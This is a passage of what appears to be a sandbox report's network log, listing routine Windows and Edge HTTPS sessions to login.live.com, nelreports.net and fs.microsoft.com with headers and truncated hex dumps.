                                                                                                                                          2024-04-12 07:15:45 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:15:45 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:15:51 UTC568INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:14:50 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C555_BL2
                                                                                                                                          x-ms-request-id: e34f22fe-be18-44eb-baca-440c5353c50f
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001DA5A V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:15:50 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 1276
                                                                                                                                          2024-04-12 07:15:51 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.54979123.200.0.384436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:48 UTC427OUTOPTIONS /api/report?cat=msn HTTP/1.1
                                                                                                                                          Host: deff.nelreports.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:15:49 UTC360INHTTP/1.1 200 OK
                                                                                                                                          Content-Length: 0
                                                                                                                                          Access-Control-Allow-Headers: content-type
                                                                                                                                          Date: Fri, 12 Apr 2024 07:15:48 GMT
                                                                                                                                          Connection: close
                                                                                                                                          PMUSER_FORMAT_QS:
                                                                                                                                          X-CDN-TraceId: 0.26ac2d17.1712906148.104eecb
                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                          Access-Control-Allow-Methods: *
                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                          Access-Control-Allow-Origin: *


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.54979523.200.0.384436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:50 UTC373OUTPOST /api/report?cat=msn HTTP/1.1
                                                                                                                                          Host: deff.nelreports.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 539
                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:15:50 UTC539OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 34 30 34 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 39 39 39 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 35 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 32 30 34 2e 37 39 2e 31 39 37 2e 32 30 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 69 6e 63 6f 6d 70 6c 65 74 65 5f 63 68 75 6e 6b 65 64 5f 65 6e 63 6f 64 69 6e 67 22 7d 2c 22 74 79 70 65 22 3a 22
                                                                                                                                          Data Ascii: [{"age":14040,"body":{"elapsed_time":49999,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":0.5,"server_ip":"204.79.197.203","status_code":200,"type":"http.response.invalid.incomplete_chunked_encoding"},"type":"
                                                                                                                                          2024-04-12 07:15:51 UTC358INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                          Date: Fri, 12 Apr 2024 07:15:51 GMT
                                                                                                                                          Content-Length: 21
                                                                                                                                          Connection: close
                                                                                                                                          PMUSER_FORMAT_QS:
                                                                                                                                          X-CDN-TraceId: 0.26ac2d17.1712906151.104f73d
                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                          Access-Control-Allow-Methods: *
                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          2024-04-12 07:15:51 UTC21INData Raw: 50 72 6f 63 65 73 73 65 64 20 74 68 65 20 72 65 71 75 65 73 74
                                                                                                                                          Data Ascii: Processed the request


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          28192.168.2.54979640.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:15:52 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:15:52 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:16:07 UTC568INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:15:07 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C555_BL2
                                                                                                                                          x-ms-request-id: 98ecb72d-e3e6-4350-94c8-c01c01cddeb7
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D7C4 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:16:07 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 1276
                                                                                                                                          2024-04-12 07:16:07 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          29192.168.2.54980140.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:16:08 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:16:08 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                          2024-04-12 07:16:09 UTC568INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                          Expires: Fri, 12 Apr 2024 07:15:09 GMT
                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                          x-ms-route-info: C555_BL2
                                                                                                                                          x-ms-request-id: 0a8c84c2-5a0d-43ed-a66f-a5788efb8872
                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D910 V: 0
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          Date: Fri, 12 Apr 2024 07:16:09 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 1276
                                                                                                                                          2024-04-12 07:16:09 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          30192.168.2.549798104.118.8.139443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:16:08 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                          2024-04-12 07:16:10 UTC531INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                          X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                                          Cache-Control: public, max-age=258436
                                                                                                                                          Date: Fri, 12 Apr 2024 07:16:10 GMT
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          X-CID: 2
                                                                                                                                          2024-04-12 07:16:10 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          31192.168.2.54980340.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:16:16 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:16:16 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          32192.168.2.54980523.40.179.374436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:16:47 UTC442OUTOPTIONS /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                          Host: bzib.nelreports.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Origin: https://business.bing.com
                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:16:57 UTC361INHTTP/1.1 200 OK
                                                                                                                                          Content-Length: 0
                                                                                                                                          Access-Control-Allow-Headers: content-type
                                                                                                                                          Date: Fri, 12 Apr 2024 07:16:57 GMT
                                                                                                                                          Connection: close
                                                                                                                                          PMUSER_FORMAT_QS:
                                                                                                                                          X-CDN-TraceId: 0.25b22817.1712906217.13887492
                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                          Access-Control-Allow-Methods: *
                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                          Access-Control-Allow-Origin: *


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          33192.168.2.54980640.126.24.81443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:16:53 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                          Content-Length: 3592
                                                                                                                                          Host: login.live.com
                                                                                                                                          2024-04-12 07:16:53 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          34192.168.2.54980723.40.179.374436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:16:58 UTC382OUTPOST /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                          Host: bzib.nelreports.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 942
                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
